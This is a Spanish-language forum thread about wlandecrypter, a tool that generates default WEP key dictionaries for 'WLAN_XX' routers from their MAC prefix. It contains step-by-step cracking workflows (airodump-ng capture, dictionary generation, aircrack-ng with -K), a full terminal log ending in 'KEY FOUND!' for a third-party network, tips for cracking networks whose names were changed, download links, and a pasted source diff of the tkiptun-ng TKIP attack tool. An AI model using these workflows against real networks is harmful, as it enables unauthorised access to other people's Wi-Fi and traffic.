joder ya vamos por la 1.0 >:( >:(
pd: subelo ya compilado, jeejje, y que se jodan los de win, jejejejejej
ok....lo subo solo compilado?
mejor hawagm sube tu el compilado a wifiway.org,y asi con un wget y un cp /usr/sbin/wlandecrypter estaria actualizado cualquier distro
-
no, claro que no, nosotros no somos asi
pd: edite mi ultimo mensaje, lo correcto era:
subelo ya compilado, jeejje, y que se jodan los que venden lanzadores de ))))) para win, jejejejejej
pero de verdad que si dan ganas de hacerlo, pero no podemos
mejor hawagm sube tu el compilado a wifiway.org
ahora no puedo, no tengo acceso, debera ser otro dia, o el encargado de wifiway.org
mejor hawagm sube tu el compilado a wifiway.org,y asi con un wget y un cp /usr/sbin/wlandecrypter estaria actualizado cualquier distro
creo que es mas correcto dejar las fuentes, pero ya veras lo que tarda en ser compilado en win, cambiando los titulos, etc, etc y sacando nueva versiones de ))))) de lanzadores
-
no, claro que no, nosotros no somos asi
pd: edite mi ultimo mensaje, lo correcto era:
subelo ya compilado, jeejje, y que se jodan los que venden lanzadores de ))))) para win, jejejejejej
pero de verdad que si dan ganas de hacerlo, pero no podemos
yo subo hasta el codigo por web.......en fin menos mal que no se compila para win2.....el dia que se haga,,,,talvez abandone esto....jojojo
p.d.siempre meto el compilado en el tar.gz
-
;D ;D
he editado varios de los im, ya me he perdido, jejeje
-
;D ;D
he editado varios de los im, ya me he perdido, jejeje
en fin que toca ponernos las pilas con otras cosas ke sabemos ;)
si alguien lee esto ke respete la opinion de este foro,y no compile para win2 ...
ahora a dormir......
-
cierto, en todo caso veras lo que tardan en hacerlo y editar las lineas iniciales
lo metere mañana en el feed
http://feed.seguridadwireless.net/
-
cierto, en todo caso veras lo que tardan en hacerlo y editar las lineas iniciales
lo metere mañana en el feed
http://feed.seguridadwireless.net/
;) perfect hwagm,como siempre dandolo todo
http://www.wifiway.org/archivos/wlandecrypter-1.0.tar.gz
-
ya esta añadido
http://feed.seguridadwireless.net/
con estos ejemplos de aplicaciones se ve perfecta la manera de trabajar con los feed, una explicacion simple y una descarga directa, si bien no se porque no lo puse para versiones anteriores
porque esta es la idea base de los feed, informacion escuesta y rapida, si alguien sabe lo que es el programa, decide bajarselo y sino pasa a otra cosa, tiempo de lectura, pues 2 segundos
-
ya esta añadido
http://feed.seguridadwireless.net/
con estos ejemplos de aplicaciones se ve perfecta la manera de trabajar con los feed, una explicacion simple y una descarga directa, si bien no se porque no lo puse para versiones anteriores
porque esta es la idea base de los feed, informacion escuesta y rapida, si alguien sabe lo que es el programa, decide bajarselo y sino pasa a otra cosa, tiempo de lectura, pues 2 segundos
el enlace no va bien.....el titulo descarrga la apliicacion y el link de descarga se va por las ramas
-
lo unico que esta mal es que descarga
http://download.aircrack-ng.org/aircrack-ng-1.0-rc2-win.zip
jejejej
ya lo cambiare, y dejare acceso al foro a este post en el titulo
sera cuando arregle el pc, que esta ko
-
cambiado, no se lo que tardara en update
-
cambiado, no se lo que tardara en update
;)
-
acabo de meter una funcion nueva en el wlandecrypter , un usuario de elhacker.net penso en meter diccionario para aquellas ESSIDs ke hayan cambiado pero conserven misma key ,y las reconozcamos por el BSSID..............
+info en elhacker.net (http://foro.elhacker.net/wireless_en_linux/saber_los_dos_ultimos_digitos_de_una_wlanxx_que_lleva_el_nombe_cambiado-t243718.0.html;msg1233167#msg1233167)
//tarda 30 segundos en crear diccionario de 224 MB, o casi 1 minuto si tiene doble cabecera serian 480 MB
lenny wlandecrypter-1.0 # ./wlandecrypter 00:01:36:00:00:00 WLAN_?? prueba
//LLamaremos WLAN_?? para avisarle del megadiccionario
lenny wlandecrypter-1.0 # ./wlandecrypter 00:01:36:00:00:00 WLAN_?? essidcambiado.txt
wlandecrypter 1.1 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
- BSSID: 00:01:36:00:00:00
- Modelo: Xavi_7768r_2009
- ESSID: WLAN_??
- Fichero de claves: essidcambiado.txt
- Fichero guardado
//vemos lo que crea
lenny wlandecrypter-1.0 # tail prueba
X000138FFFFF6
X000138FFFFF7
X000138FFFFF8
X000138FFFFF9
X000138FFFFFA
X000138FFFFFB
X000138FFFFFC
X000138FFFFFD
X000138FFFFFE
X000138FFFFFF
//vemos lo que ocupa
lenny wlandecrypter-1.0 # ls -l -h prueba
-rw-r--r-- 1 root root 224M may 18 14:53 prueba
lenny wlandecrypter-1.0 #
en un rato lo subire............
-
lenny wlandecrypter-1.1 # wlandecrypter
wlandecrypter 1.1 - 2007-2008-2009 dudu[at]seguridadwireless.net
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
*Essid:
WLAN_?? : Para crear diccionario con todas las posibilidades.
lenny wlandecrypter-1.1 #
descarga wlandecrypter 1.1.tar.gz (http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-1.1.tar.gz)
El codigo en : http://codepad.org/ApmfMyJH
-
el feed ya es correcto, pero obsoleto, ejejej, ya que aparecio new version
-
Muy guenas a tod@s !!
Estupendo trabajo con wlandescrypter, ese wlan_?? es muy majo y lo mismo para la funcion essidCambiado >:( , aunque en una version privada utilize otra funcion parecida para sacar por jazzteldescrypter con JAZZTEL_**, no hay 2 cabeceras ;D
Un saludo.
PD: Como siempre, en algo, habre metido la pata.
-
si hay versiones privadas del wlandecrypter, sinceramente me parece algo muy patetico, asi no se puede mejorar una palicacion, esta solo se mejora si es de codigo abierto.
Me es igual de quien sea esa version privada, pero la verdad es que es de pena penita pena.
-
si hay versiones privadas del wlandecrypter, sinceramente me parece algo muy patetico, asi no se puede mejorar una palicacion, esta solo se mejora si es de codigo abierto.
Me es igual de quien sea esa version privada, pero la verdad es que es de pena penita pena.
eso lo tengo clarito , si codigo abieto y sirve para mejorar , muy bien , sino más que de pena de p... pena
-
creo ke buckynet se refereria a alguna trastada suya ke se habria echo el mismo y no publico................
de todos modos ,yo siempre cuelgo el source y a parte un link con el codigo..el ke kiera ke lo mejore ,es libre de hacerlo.......siempre respetando autores.....y dejando el codigo abierto.........
por lo menos es lo que nilp0inter me dijo , y ke se alegro ke lo siguiese actualizando
descarga wlandecrypter 1.1.tar.gz (http://www.fileden.com/files/2008/10/11/2138272/wlandecrypter-1.1.tar.gz)
El codigo en : http://codepad.org/ApmfMyJH
-
Muy guenas a tod@s !!
Hwagm, has entendido mal, y yo lo he expresado mal tambien. dudux ha acertado a decir que es una pequeña prueba sobre el jazztel y no sobre wlan.
Un saludo.
PD: Como siempre, en algo, habre metido la pata.
-
siendo así no he dicho nada ^-^
-
ostias mil perdones, mejor que hubiera callado la boca ^-^
lo siento.
-
Hoy volviendo en bus y con el movil con barbelo he mirado todas las macs de WLAN_XX
Y me he encontrado con esta 00:1F:9F:XX:XX:XX
alguien sabe algo?
Version 1.1
Referente a la version 1.1,hoy audite una red llamada alejandria con mac 00:02:CF:XX:XX:XX y acabe antes reinyectando en 6 minutos ,ke usando la fuerza bruta............este caso es para cuando no hay cliente.....
A tardado media hora con la cpu a 100%
wifiway wlandecrypter-1.1 # wlandecrypter 00:02:CF:BX:XX:XX WLAN_?? al
wlandecrypter 1.1 - 2007-2008-2009 dudu[at]seguridadwireless.net_?? | w
2006 nilp0inter2k6_at_gmail.com
----------> http://www.seguridadwireless.net <----------
uso: wlandecrypter <bssid> <essid> [output file]
*Essid:
WLAN_?? : Para crear diccionario con todas las posibilidades.
- BSSID: 00:02:CF:BXXXXXX
- Modelo: ZyGate
- ESSID: WLAN_??
- Fichero de claves: alex
- Fichero guardado
root/majo-01.cap pter-1.1 # aircrack-ng -w alex -b 00:02:CF:X6:XX:X8 /root/majo-01.cap
Opening /root/majo-01.cap
Read 3339 packets.
Aircrack-ng 0.9.3
[00:31:12] Tested 24127153 keys (got 132 IVs)
KB depth byte(vote)
0 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
1 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
2 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
3 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
4 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
5 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
6 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
7 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
8 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
9 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
10 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
11 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
12 0/ 0 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0)
KEY FOUND! [ 5A:30:30:30:32:43:46:42:38:31:33:35:38 ] (ASCII: Z0002CFB81358 )
Decrypted correctly: 100%
wifiway wlandecrypter-1.1 #
-
añadido la 1.1
http://feed.seguridadwireless.net/
-
;)
-
muy bueno, provado y efectivamente, en 18 minutos se logró el objetivo. (tengo un pentium III).
Efectivamente, se me habian planteados casos así, en los que el abonado, por comodidad, solo cambiaba el nombre del ESSID, dejando la clave per defecto para no perderla, olvidarla, etc. De hecho tengo un compañero que tiene un bar turistico y así lo hizo, cambió el WLAN_XX que tenia por el nombre del BAR para que los clientes supieran que red era a la que tenian que conectar, dejando la clave la de defecto.
Seguid así, sois la ostia.
-
juax, lo teneis todo pensado, de esta forma si tengo claro que alguno de nosotros acabara entre rejas
-
juax, lo teneis todo pensado, de esta forma si tengo claro que alguno de nosotros acabara entre rejas
yo no pienso ser.......cada cual vera lo que hace con este programa........sino que sea lea el readme.txt
-
juax, lo teneis todo pensado, de esta forma si tengo claro que alguno de nosotros acabara entre rejas
Investigar no es delito, y algunos esto lo hacemos para aprender, esta claro que "robar" es un delito, pero aquí no hacemos eso.
Hay quien le gusta aprender ;)
-
Muy buena la opcion de WLAN_??, es algo interesante
-
juax, lo teneis todo pensado, de esta forma si tengo claro que alguno de nosotros acabara entre rejas
Investigar no es delito, y algunos esto lo hacemos para aprender, esta claro que "robar" es un delito, pero aquí no hacemos eso.
Hay quien le gusta aprender ;)
>:( >:(
Muy buena la opcion de WLAN_??, es algo interesante
de 4 intentos / 4 aciertos........... :D
-
juax, lo teneis todo pensado, de esta forma si tengo claro que alguno de nosotros acabara entre rejas
Investigar no es delito, y algunos esto lo hacemos para aprender, esta claro que "robar" es un delito, pero aquí no hacemos eso.
Hay quien le gusta aprender ;)
Robar es delito pero atacar maquinas ajenas tambien es un delito de echo robar es un delito menos mientras que atacar maquinas por las que pasa informacion delicada es un delito informatico bastante peor que un simple robo que supere los 400€
Nosotros nunca hemos querido ayudar a joder al vecino y no pretendemos que nuestros usuarios lo hagan. Este tipo de aplicaciones estan para que los gigantes inviertan un poco mas de tiempo en la seguridad que ofrecen a sus clientes, y no los dejen con el culo al aire ante cualquier persona.
-
Hoy volviendo en bus y con el movil con barbelo he mirado todas las macs de WLAN_XX
Y me he encontrado con esta 00:1F:9F:XX:XX:XX
alguien sabe algo?
-
pues la verdad es la primera de esas que oigo nombrar ... ;)
-
pues la verdad es la primera de esas que oigo nombrar ... ;)
es ke es muy nueva......
de hecho solo he visto una por ahora..
-
Buenas, tras un periodo de aletargo, vuelvo a retomar el tema de la auditoria y no veas lo que me cuesta, lo NADA que sabia de comandos Linux se agudiza y ando mas perdido que perdido, pero a lo que voy, veo que se van metiendo nuevas cabeceras en el Wlandecrypter y saliendo nuevas versiones, y me he fijado en la versión 1.0, donde se han incorporado MACs del tipo 00:01:36:XX:XX:XX
Luego, he visto en este mismo hilo esto
wlandecrypter 1.1 - 2007-2008-2009 dudu[at]seguridadwireless.net
...
BSSID: 00:01:36:00:00:00
Modelo: Xavi_7768r_2009
ESSID: WLAN_??
Fichero de claves: essidcambiado.txt
Fichero guardado
//vemos lo que crea
lenny wlandecrypter-1.0 # tail prueba
X000138FFFFF6
X000138FFFFF7
X000138FFFFF8
X000138FFFFF9
X000138FFFFFA
X000138FFFFFB
X000138FFFFFC
X000138FFFFFD
X000138FFFFFE
X000138FFFFFF
Y al ver X000138 he pensado que igual es válido para MACs con cabecera 00:01:38, ¿ Estoy en lo cierto ?
Espero que la respuesta no sea que lo pruebe.
Un Saludo.
-
revisa las cabeceras,en el codigo
-
Hola
He probado con muchos WLAN_XX y aunque el wlandecrypter funciona correctamente me es imposible coger IV's con airodump-ng pese a que otras redes 'normales' si que me coge, ademas con las redes WLAN_XX wpa_supplicant no es capaz de asociarse, espero que me puedan ayudar
Gracias por adelantado
-
Hola
He probado con muchos WLAN_XX y aunque el wlandecrypter funciona correctamente me es imposible coger IV's con airodump-ng pese a que otras redes 'normales' si que me coge, ademas con las redes WLAN_XX wpa_supplicant no es capaz de asociarse, espero que me puedan ayudar
Gracias por adelantado
las redes WLAN_XX no usan wpa_supplicant usan WEP..............sino cojes datas lee el README.txt
-
Perdonar mi ignorancia soy nuevo en estos lares de el mundo wifi, cuando le doy a instalar el nuevo wlandecripter machaca el q ya tiene el wifiway 1 final, o por el contrario hay q arrancarlo aparte?, gracias de antemano..salu2
-
Perdonar mi ignorancia soy nuevo en estos lares de el mundo wifi, cuando le doy a instalar el nuevo wlandecripter machaca el q ya tiene el wifiway 1 final, o por el contrario hay q arrancarlo aparte?, gracias de antemano..salu2
lo machaca........por eso make clean
lee el README.txt
-
ok, gracias por todo, salu2.
-
wifipacket update
wifipacket list
wifipacket install wlandecrypter
en estos momentos os metera la 1.1, con la gui actualizada con la lista apropiada
-
no logro qe funcione.
capto paqetes, unos cuantos data, a continuacion lanzo el wlandecrypter y me crea el diccionario supuestamente bien, cuando lanzo aircrack aparece muchas columnas de 00 y a continuacion aircrack se cierra solo. alguien sabria ayudarme?
-
(http://img193.imageshack.us/img193/9906/captura3y.th.jpg) (http://img193.imageshack.us/i/captura3y.jpg/)
eso es lo que hago y el error qe me da.
un saludo y gracias a todos
-
parece que no hay errores solo no encuentra la clave.
veces la gente lo cambia
-
pero cuando yo ejecuto el aircrack pone combinaciones de numeros y letras, esto son solo 00
-
prueba este mismo *.cap en live cd wifiway con wlandecripter ya instalado aver si tu lo instalaste incorecto o algo mas, otra cosa es vercion de aircrack-ng con algunas avia problemas con dic
-
acabo de meter una funcion nueva en el wlandecrypter , un usuario de elhacker.net penso en meter diccionario para aquellas ESSIDs ke hayan cambiado pero conserven misma key ,y las reconozcamos por el BSSID..............
//tarda 30 segundos en crear diccionario de 224 MB, o casi 1 minuto si tiene doble cabecera serian 480 MB
¿Alguien puede subir el txt generado de 480 megas?
-
Estos dias me he encontrado con este tipo de red WLAN, no sé si es una WLAN nueva o es otra variante de las WLAN_xx:
WLANXXXXXX ---> MAC = 00:13:F7:EX:XX:XX
(http://lh4.ggpht.com/_ZMKZt6r4FmA/SoUM8gwYs4I/AAAAAAAAADw/EHQ_Pk7-A8I/W.JPG)
-
las WLANXXXXXX son de ya.com, de sus routers SMC, y todavía no hay diccionario para ellas :'(
-
acabo de meter una funcion nueva en el wlandecrypter , un usuario de elhacker.net penso en meter diccionario para aquellas ESSIDs ke hayan cambiado pero conserven misma key ,y las reconozcamos por el BSSID..............
//tarda 30 segundos en crear diccionario de 224 MB, o casi 1 minuto si tiene doble cabecera serian 480 MB
¿Alguien puede subir el txt generado de 480 megas?
bufff tarda un minuto en crearse.........a ver si alguien se anima a subirlo.yo no tengo tiempo ahora.
-
gracias a berni69..........
Descarga para windows
http://www.sendspace.com/file/ctctvj
Descarga para Openwrt (foneras)
http://www.tufonera.com/ftp/wlandecrypter.tar.gz
http://www.sendspace.com/file/kaf9vt
-
gracias a berni69..........
Descarga para windows
http://www.sendspace.com/file/ctctvj
Descarga para Openwrt (foneras)
http://www.tufonera.com/ftp/wlandecrypter.tar.gz
http://www.sendspace.com/file/kaf9vt
esto no es el superdiccionario no? es el wlandecrypter para windows y openwrt solo, es asi?
un saludo y gracias
-
pero cuando yo ejecuto el aircrack pone combinaciones de numeros y letras, esto son solo 00
no pasa nada por 00 ,es mas es normal cuando usas -w
la clave la han cambiado seguramente.o tu version d aicrack no va fina,veo ke muy bien usas -K
solo te digo ke actualices aircrack a la rc4 y veas o pruebes el aircrack 0.9.3 ke lleva wifiway 1.0
lo que dices del diccionario es una locura,pq son 224 MB por cada cabecera y 480 MB por las cabeceras ke puedan llevar doble clave,asi ke........
10 cabeceras simples = 224 x 10 =2240 MB =2,2 gb
4 cabeceras dobles = 480 x 4 = 1920 MB = 1,9 gb
-------------------------------------------------------------------
4,1 GB diccionario para cualquier WLAN
-
Hola, lo he estado probando con varias redes:
2 que empiezan así 00:01:38:XX:XX:XX
2 que empiezan así 00:02:CF:XX:XX:XX
1 que empieza asi 00:16:38:XX:XX:XX
2 que empiezan así 00:02:CF:XX:XX:XX
7 redes y no he sido capaz de conseguirlo :-\
Lo que hago es lo siguiente
airodump-ng -w captura --channel X ath0
wlandecrypter XX:XX:XX:XX:XX:XX WLAN_XX diccionario00.txt
aircrack-ng -b XX:XX:XX:XX:XX:XX -w diccionario00.txt captura.cap
Siempre lo he hecho con mínimo 10 ivs y en BackTrack 3, no se lo que hago mal :S he leido por ahí atrás algo de la versión del aircrack, no se si será ese el problema
PD: Me he leído el Leeme :P
Un saludo
-
pero cuando yo ejecuto el aircrack pone combinaciones de numeros y letras, esto son solo 00
no pasa nada por 00 ,es mas es normal cuando usas -w
la clave la han cambiado seguramente.o tu version d aicrack no va fina,veo ke muy bien usas -K
solo te digo ke actualices aircrack a la rc4 y veas o pruebes el aircrack 0.9.3 ke lleva wifiway 1.0
lo que dices del diccionario es una locura,pq son 224 MB por cada cabecera y 480 MB por las cabeceras ke puedan llevar doble clave,asi ke........
10 cabeceras simples = 224 x 10 =2240 MB =2,2 gb
4 cabeceras dobles = 480 x 4 = 1920 MB = 1,9 gb
-------------------------------------------------------------------
4,1 GB diccionario para cualquier WLAN
no, si yo solo preguntaba, no sabia de qe iba, pero si descargar y tener qe subir 4.1gb.... es una burrada.
un saludo y gracias
-
Hola, lo he estado probando con varias redes:
2 que empiezan así 00:01:38:XX:XX:XX
2 que empiezan así 00:02:CF:XX:XX:XX
1 que empieza asi 00:16:38:XX:XX:XX
2 que empiezan así 00:02:CF:XX:XX:XX
7 redes y no he sido capaz de conseguirlo :-\
Lo que hago es lo siguiente
airodump-ng -w captura --channel X ath0
wlandecrypter XX:XX:XX:XX:XX:XX WLAN_XX diccionario00.txt
aircrack-ng -b XX:XX:XX:XX:XX:XX -w diccionario00.txt captura.cap
Siempre lo he hecho con mínimo 10 ivs y en BackTrack 3, no se lo que hago mal :S he leido por ahí atrás algo de la versión del aircrack, no se si será ese el problema
PD: Me he leído el Leeme :P
Un saludo
es por el aircrack...............mira de usar -K
aircrack-ng -b XX:XX:XX:XX:XX:XX -w diccionario00.txt -K captura.cap
-
Hola, lo he estado probando con varias redes:
2 que empiezan así 00:01:38:XX:XX:XX
2 que empiezan así 00:02:CF:XX:XX:XX
1 que empieza asi 00:16:38:XX:XX:XX
2 que empiezan así 00:02:CF:XX:XX:XX
7 redes y no he sido capaz de conseguirlo :-\
Lo que hago es lo siguiente
airodump-ng -w captura --channel X ath0
wlandecrypter XX:XX:XX:XX:XX:XX WLAN_XX diccionario00.txt
aircrack-ng -b XX:XX:XX:XX:XX:XX -w diccionario00.txt captura.cap
Siempre lo he hecho con mínimo 10 ivs y en BackTrack 3, no se lo que hago mal :S he leido por ahí atrás algo de la versión del aircrack, no se si será ese el problema
PD: Me he leído el Leeme :P
Un saludo
es por el aircrack...............mira de usar -K
aircrack-ng -b XX:XX:XX:XX:XX:XX -w diccionario00.txt -K captura.cap
Se me olvidó comentarlo, al usar -k se me apaga el pc, no de golpe, me sale antes un mensaje anunciando que se va a apagar :S :S
-
Si te sucede esto....................
(http://img193.imageshack.us/img193/9906/captura3y.th.jpg) (http://img193.imageshack.us/i/captura3y.jpg/)
y quieres usar wlandecrypter o pruebas la RC4 o metes la 0.9.3 de aircrack
P.D.Siempre puedes usar wepattack o weplab,aunqe las que tienen doble cabecera no es muy fiable
-k o -K?
-
Si te sucede esto....................
(http://img193.imageshack.us/img193/9906/captura3y.th.jpg) (http://img193.imageshack.us/i/captura3y.jpg/)
y quieres usar wlandecrypter o pruebas la RC4 o metes la 0.9.3 de aircrack
P.D.Siempre puedes usar wepattack o weplab,aunqe las que tienen doble cabecera no es muy fiable
-k o -K?
No, el aircrack no me sale todo cero.
Creo que era -K porque hice un copy paste del leeme. el wepattack y weplab los intente instalar en el backTrack 3 pero no fui capaz :/
-
entonces? ???
-
entonces? ???
El aircrack muestra los números que muestra normalmente, osea no hay fallo aparente pero no saca la clave, solo indica que necesita más ivs
De todas formas lo he probado con el aircrack de windows y si funciona, por lo que está claro que es problema del aircrack que está en el blackTrack 3
Gracias por la ayuda ;)
-
que version de aircrack es?
-
deberia ser la 0.9.3
estoy casi seguro de qe es esa pero me estan entrando un poco de dudas.
un saludo y a ver si lo resolveis qe yo tambien he tenido problemas
-
Sí, creo que es la 0.9.3, la que viene por defecto en BackTrack 3 vaya
-
pues esa es la que lleva wifiway 1.0 final y no da problemas ,de echo en la captura del bt3 sale que es la 1.0 rc1 r1???
-
vamos, que deberia funcionar perfectamente pero no funciona. yo lo habia dejado por imposible ya.
si ponemos la RC4 de aircrack que ha salido hace poco funcionara mejor?
un saludo
-
hay que probarlo................yo no la he probado todavia...y tu?
-
al final no lo he probado, el dia qe iba a instalarlo fue el dia que lanzaron la rc4 (yo iba a instalar la rc3) y como no funcionaba el enlace y tal no lo he probado, en unos dias termino los examenes y estare mas libre de nuevo.
me insiste un amigo en qe use el aircrack ptw, podria funcionar el wlandecrypter con esta version de aircrack?
un saludo
-
no tiene nada que ver el ptw,con la rc3 funciona bien con -K
-
imposible abrir mac 00:1C:XX:XX:XX:XX no sale en este wlandecrypter
-
no, lo que pasa es que no esta incluido, un saludo!!
-
no, lo que pasa es que no esta incluido, un saludo!!
gracis por la respuesta
la van a incluir en alguna actualizacion?
-
imposible abrir mac 00:1C:XX:XX:XX:XX no sale en este wlandecrypter
mandame la clave o sino un .cap con + de 5 ivs.................y veré que puedo haceer
por privado
-
mira no se que hacer mi wlan empieza 00:21:29... y este no aparece en ninguno de los wlandecrypter
por ciert y hablando de otra cosa quiero saber que es exactamente el codigo que voy a poner mas abajo lo encontre por ahi y quiero saber si funciona para algo productivo, mi intuicion me dice que muy probablemente tenga una buena funcion pero y si es asi como le hago para que esa cosa sirva. por cierto lo copie en un doc tipo txt o eso creo y le aparecio una curita encima eso que significa??? :-\. y por si algo me confieso completamente ignorante de lo que signifique el codigo o scrip o lo que sea esa cosa
bueno este es el codigo del que les hablaba:
Index: /src/router/aircrack-ng/VERSION
===================================================================
--- /src/router/aircrack-ng/VERSION (revision 11606)
+++ /src/router/aircrack-ng/VERSION (revision 11928)
@@ -1,1 +1,1 @@
-1.0-rc2
+1.0-rc3
Index: /src/router/aircrack-ng/src/tkiptun-ng.c
===================================================================
--- /src/router/aircrack-ng/src/tkiptun-ng.c (revision 11606)
+++ /src/router/aircrack-ng/src/tkiptun-ng.c (revision 11928)
@@ -134,4 +134,6 @@
#define RATE_54M 54000000
+#define DEFAULT_MIC_FAILURE_INTERVAL 60
+
static uchar ZERO[32] =
"\x00\x00\x00\x00\x00\x00\x00\x00"
@@ -163,9 +165,10 @@
" -d dmac : MAC address, Destination\n"
" -s smac : MAC address, Source\n"
-" -m len : minimum packet length\n"
-" -n len : maximum packet length\n"
+" -m len : minimum packet length (default: 80) \n"
+" -n len : maximum packet length (default: 80)\n"
" -t tods : frame control, To DS bit\n"
" -f fromds : frame control, From DS bit\n"
" -D : disable AP detection\n"
+" -Z : select packets manually\n"
"\n"
" Replay options:\n"
@@ -175,6 +178,6 @@
" -c dmac : set Destination MAC address\n"
" -h smac : set Source MAC address\n"
-" -F : choose first matching packet\n"
" -e essid : set target AP SSID\n"
+" -M sec : MIC error timout in seconds [60]\n"
"\n"
" Debug options:\n"
@@ -213,4 +216,6 @@
int f_minlen;
int f_maxlen;
+ int f_minlen_set;
+ int f_maxlen_set;
int f_type;
int f_subtype;
@@ -2147,4 +2152,5 @@
int tries=0;
int keystream_len=0;
+ int settle=0;
unsigned char b1 = 0xAA;
@@ -2453,4 +2459,14 @@
/* wait for the next timer interrupt, or sleep */
+ if( (nb_pkt_sent > 0) && (nb_pkt_sent % 256 == 0) && settle == 0)
+ {
+ printf( "\rLooks like mic failure report was not detected."
+ "Waiting %i seconds before trying again to avoid "
+ "the AP shutting down.\n", opt.mic_failure_interval);
+ fflush( stdout );
+ settle = 1;
+ sleep(opt.mic_failure_interval);
+ }
+
if( dev.fd_rtc >= 0 )
{
@@ -2619,4 +2635,6 @@
else
tries++;
+
+ settle=0;
}
@@ -2697,19 +2715,19 @@
/* check if it's a WEP data packet */
- if( ( h80211[0] & 0x0C ) != 8 ) continue;
+ if( ( h80211[0] & 0x0C ) != 8 ) continue; //must be a data packet
if( ( h80211[0] & 0x70 ) != 0 ) continue;
// if( ( h80211[1] & 0x03 ) != 2 ) continue;
if( ( h80211[1] & 0x40 ) == 0 ) continue;
- /* check the extended IV (TKIP) flag */
-
+ /* get header length right */
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
z+=2;
+ /* check the extended IV (TKIP) flag */
if( ( h80211[z + 3] & 0x20 ) == 0 ) continue;
/* check length (153)!? */
- if( n != 153 ) continue;
+ if( z+127 != n ) continue; //(153[26+127] bytes for eapol mic failure in tkip qos frames from client to AP)
// printf("yeah!\n");
@@ -2761,4 +2779,5 @@
// guess = h80211[9];
tries = 0;
+ settle = 0;
guess = (guess - 1) % 256;
@@ -3697,5 +3716,7 @@
opt.f_type = -1; opt.f_subtype = -1;
- opt.f_minlen = 80; opt.f_maxlen = 96;
+ opt.f_minlen = 80; opt.f_maxlen = 80;
+ opt.f_minlen_set = 0;
+ opt.f_maxlen_set = 0;
opt.f_tods = -1; opt.f_fromds = -1;
opt.f_iswep = -1; opt.ringbuffer = 8;
@@ -3704,7 +3725,7 @@
opt.ghost = 0; opt.npackets = -1;
opt.delay = 15; opt.bittest = 0;
- opt.fast = 0; opt.r_smac_set = 0;
+ opt.fast = -1; opt.r_smac_set = 0;
opt.npackets = 1; opt.nodetect = 0;
- opt.mic_failure_interval = 60;
+ opt.mic_failure_interval = DEFAULT_MIC_FAILURE_INTERVAL;
/* XXX */
@@ -3737,5 +3758,5 @@
int option = getopt_long( argc, argv,
- "d:s:m:n:t:f:x:a:c:h:e:jy:i:r:HFDK:P:p:",
+ "d:s:m:n:t:f:x:a:c:h:e:jy:i:r:HZDK:P:p:M:",
long_options, &option_index );
@@ -3787,4 +3808,5 @@
return( 1 );
}
+ opt.f_minlen_set=1;
break;
@@ -3798,4 +3820,5 @@
return( 1 );
}
+ opt.f_maxlen_set=1;
break;
@@ -3929,7 +3952,7 @@
break;
- case 'F' :
-
- opt.fast = 1;
+ case 'Z' :
+
+ opt.fast = 0;
break;
@@ -3992,4 +4015,15 @@
strncpy( opt.psk, optarg, sizeof( opt.psk ) - 1 );
opt.got_psk = 1;
+ break;
+
+ case 'M' :
+
+ ret = sscanf( optarg, "%d", &opt.mic_failure_interval );
+ if( opt.mic_failure_interval < 0 )
+ {
+ printf( "Invalid MIC error timeout. [>=0]\n" );
+ printf("\"%s --help\" for help.\n", argv[0]);
+ return( 1 );
+ }
break;
@@ -4281,14 +4315,25 @@
PCT; printf("Waiting for an ARP packet coming from the Client...\n");
-/* opt.f_minlen = 80;
- opt.f_maxlen = 80;*/
opt.f_tods = 1;
opt.f_fromds = 0;
memcpy(opt.f_smac, opt.r_smac, 6);
-// memcpy(opt.f_dmac, opt.f_bssid, 6);
- opt.fast = 1;
-
- if( capture_ask_packet( &caplen, 0 ) != 0 )
- return( 1 );
+// memcpy(opt.f_dmac, opt.f_bssid, 6);
+ if(opt.fast == -1)
+ opt.fast = 1;
+
+ if(opt.f_minlen_set == 0) {
+ opt.f_minlen = 80;
+ }
+ if(opt.f_maxlen_set == 0) {
+ opt.f_maxlen = 80;
+ }
+
+ while(1)
+ {
+ if( capture_ask_packet( &caplen, 0 ) != 0 )
+ return( 1 );
+ if( is_qos_arp_tkip(h80211, caplen) == 1 )
+ break;
+ }
memcpy(packet2, h80211, caplen);
@@ -4299,14 +4344,23 @@
PCT; printf("Waiting for an ARP response packet coming from the AP...\n");
-/* opt.f_minlen = 80;
- opt.f_maxlen = 80;*/
opt.f_tods = 0;
opt.f_fromds = 1;
memcpy(opt.f_dmac, opt.r_smac, 6);
